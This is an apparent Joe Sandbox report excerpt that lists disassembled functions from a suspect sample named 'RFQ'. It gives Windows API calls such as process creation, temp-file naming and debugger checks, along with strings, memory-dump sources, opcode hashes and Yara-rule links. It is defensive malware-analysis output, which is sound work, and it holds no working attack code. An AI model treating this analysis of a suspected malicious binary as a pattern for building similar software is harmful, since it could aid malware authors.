                                                                            Function 006E1CAC Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 46windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0068B606: _wcslen.LIBCMT ref: 0068B610
                                                                              • Part of subcall function 006E3BEF: GetClassNameW.USER32(?,?,000000FF), ref: 006E3C12
                                                                            • SendMessageW.USER32(?,0000018B,00000000,00000000), ref: 006E1D17
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: ClassMessageNameSend_wcslen
                                                                            • String ID: ComboBox$ListBox
                                                                            • API String ID: 624084870-1403004172
                                                                            • Opcode ID: 4f7c17419e9f87f78e81be32bd7735a0eb83eae043941ad189d52b351375a3b6
                                                                            • Instruction ID: 9198ce8c27a6af184d83382be85875c505b49f664cd263918c6daa539c337223
                                                                            • Opcode Fuzzy Hash: 4f7c17419e9f87f78e81be32bd7735a0eb83eae043941ad189d52b351375a3b6
                                                                            • Instruction Fuzzy Hash: DBF0F971B5235867CB14FBA6CC56BFE736AAF02340F100559B4226B3C2EB75590CC268
                                                                            Function 00718064 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 40processCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000020,00000000,00000000,00753008,0075304C), ref: 007180B1
                                                                            • CloseHandle.KERNEL32 ref: 007180C3
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CloseCreateHandleProcess
                                                                            • String ID: L0u
                                                                            • API String ID: 3712363035-2045255414
                                                                            • Opcode ID: 1dd9ff17cb24ca442df54ab216cd9bace940fa70e336ff8fe5e4840d10ea551c
                                                                            • Instruction ID: 69d6a5079e9c24db682530c839582ac90e7a40ee6e681200c138146e919d4d27
                                                                            • Opcode Fuzzy Hash: 1dd9ff17cb24ca442df54ab216cd9bace940fa70e336ff8fe5e4840d10ea551c
                                                                            • Instruction Fuzzy Hash: EBF054B1580304BAF31167646C45FF7795DEB05791F408020BA0CD91F1D6BD4E5486AD
                                                                            Function 007073A5 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: _wcslen
                                                                            • String ID: 3, 3, 16, 0
                                                                            • API String ID: 176396367-3261555341
                                                                            • Opcode ID: b34fb189116798308bc132447991a8cbf0c288ff38e1be29c4f4a2d56cde10f0
                                                                            • Instruction ID: 8c5dd5f9bd9044e241b1b2cb121329772758dccb6faa2d9f48d1070248dde2aa
                                                                            • Opcode Fuzzy Hash: b34fb189116798308bc132447991a8cbf0c288ff38e1be29c4f4a2d56cde10f0
                                                                            • Instruction Fuzzy Hash: A5E02B4660539090E2782279BCC197F92C9EFCA750710142FFC81C22E5EFD8DC92E3A0
                                                                            Function 006A0CC2 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 22COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 0069F8A8: InitializeCriticalSectionAndSpinCount.KERNEL32(?,00000000,?,006A0CF1,?,?,?,0068100A), ref: 0069F8AD
                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,0068100A), ref: 006A0CF5
                                                                            • OutputDebugStringW.KERNEL32(ERROR : Unable to initialize critical section in CAtlBaseModule,?,?,?,0068100A), ref: 006A0D04
                                                                            Strings
                                                                            • ERROR : Unable to initialize critical section in CAtlBaseModule, xrefs: 006A0CFF
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: CountCriticalDebugDebuggerInitializeOutputPresentSectionSpinString
                                                                            • String ID: ERROR : Unable to initialize critical section in CAtlBaseModule
                                                                            • API String ID: 55579361-631824599
                                                                            • Opcode ID: 598a4c029ad3ca2d7d3dc269866ceea1d9bfdd32e22c5b9b26efed289f999204
                                                                            • Instruction ID: 373e8e70228913794264c62beb4c5e74db5ae8a7aa1b421852221166463d427f
                                                                            • Opcode Fuzzy Hash: 598a4c029ad3ca2d7d3dc269866ceea1d9bfdd32e22c5b9b26efed289f999204
                                                                            • Instruction Fuzzy Hash: 21E06D746407008BE7A0BFACD8043827BE5BF00741F00CA2CE486C6691DBF8E8888BA1
                                                                            Function 0069E364 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 21COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • __Init_thread_footer.LIBCMT ref: 0069E3A1
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Init_thread_footer
                                                                            • String ID: 0%u$8%u
                                                                            • API String ID: 1385522511-2666027011
                                                                            • Opcode ID: 27b46499d2928d72cfc32c2c2bb732bf00c3d6f554593e642f260c41f9356cd3
                                                                            • Instruction ID: cc9fcf1baa6c1bacb17ce8ce61081fc905ccd85c38fc054b3f1580380aee65dd
                                                                            • Opcode Fuzzy Hash: 27b46499d2928d72cfc32c2c2bb732bf00c3d6f554593e642f260c41f9356cd3
                                                                            • Instruction Fuzzy Hash: A8E02631058A14CBDE04EF18F8549C8335BEB27332B1041FCE40187693EB6A6C438A0C
                                                                            Function 006F2F35 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 18COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • GetTempPathW.KERNEL32(00000104,?,00000001), ref: 006F2F4D
                                                                            • GetTempFileNameW.KERNEL32(?,aut,00000000,?), ref: 006F2F62
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: Temp$FileNamePath
                                                                            • String ID: aut
                                                                            • API String ID: 3285503233-3010740371
                                                                            • Opcode ID: 0f3e39e200a56831f8c495bc157206f6825e4b263c7252de14562dfc3a4cb724
                                                                            • Instruction ID: 8194006ec57ab22685aeeacd5d318cbbca74debdb740c3652cf29cb53fa70ba7
                                                                            • Opcode Fuzzy Hash: 0f3e39e200a56831f8c495bc157206f6825e4b263c7252de14562dfc3a4cb724
                                                                            • Instruction Fuzzy Hash: F5D05B7254031467DA6097D89C0DFC73A6CD705750F0085517655D50D1DAB49544C694
                                                                            Function 006DD9B8 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 17timeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: LocalTime
                                                                            • String ID: %.3d$X64
                                                                            • API String ID: 481472006-1077770165
                                                                            • Opcode ID: c048301eaddf9a76f6ae0786710ff5cd69bc20012af5ff783f7161b2d9bd23ec
                                                                            • Instruction ID: 4c00d0c25805bec0e6ae2011ec97443af35b1dc9f8fbe2a20bf02d23fcf943e9
                                                                            • Opcode Fuzzy Hash: c048301eaddf9a76f6ae0786710ff5cd69bc20012af5ff783f7161b2d9bd23ec
                                                                            • Instruction Fuzzy Hash: EED01265C09108D6CB80ABD0DC458B9777EBB08300F54C453F906E1140E7388549AB21
                                                                            Function 00712255 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0071225F
                                                                            • PostMessageW.USER32(00000000,00000111,00000197,00000000), ref: 00712272
                                                                              • Part of subcall function 006EE899: Sleep.KERNEL32 ref: 006EE911
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 7f641acf2a724dea262e06577284e0fc1f446b03ee993767369b5c26d5470386
                                                                            • Instruction ID: 2a64d5d66b090caf58196d5fcd3f91605ac92fdb2fdf071e1b3554b8b0ec6adb
                                                                            • Opcode Fuzzy Hash: 7f641acf2a724dea262e06577284e0fc1f446b03ee993767369b5c26d5470386
                                                                            • Instruction Fuzzy Hash: E9D0A9713D03007AE260A3B8AC0FFCAAA149B00B00F01C8067609AA1C0C8A8A800CA08
                                                                            Function 00712289 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 15windowCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0071229F
                                                                            • PostMessageW.USER32(00000000), ref: 007122A6
                                                                              • Part of subcall function 006EE899: Sleep.KERNEL32 ref: 006EE911
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000000.00000002.1675775976.0000000000681000.00000020.00000001.01000000.00000003.sdmp, Offset: 00680000, based on PE: true
                                                                            • Associated: 00000000.00000002.1675728153.0000000000680000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.000000000071C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1675996711.0000000000742000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676052369.000000000074C000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                            • Associated: 00000000.00000002.1676091059.0000000000754000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                            Joe Sandbox IDA Plugin
                                                                            • Snapshot File: hcaresult_0_2_680000_RFQ.jbxd
                                                                            Similarity
                                                                            • API ID: FindMessagePostSleepWindow
                                                                            • String ID: Shell_TrayWnd
                                                                            • API String ID: 529655941-2988720461
                                                                            • Opcode ID: 410f33b5e852c5290f1ac42144d6be5e1c172beedd5bea358ecc87f5b13b9c50
                                                                            • Instruction ID: 9bf9c2977fb342324a7b7c7a41cc63483d3abd8c93ab0b18f1d093a0f1f81d06
                                                                            • Opcode Fuzzy Hash: 410f33b5e852c5290f1ac42144d6be5e1c172beedd5bea358ecc87f5b13b9c50
                                                                            • Instruction Fuzzy Hash: 09D0A9713C03003AE260A3B8AC0FFCAAA149B05B00F01C8067609AA1C0C8A8A800CA08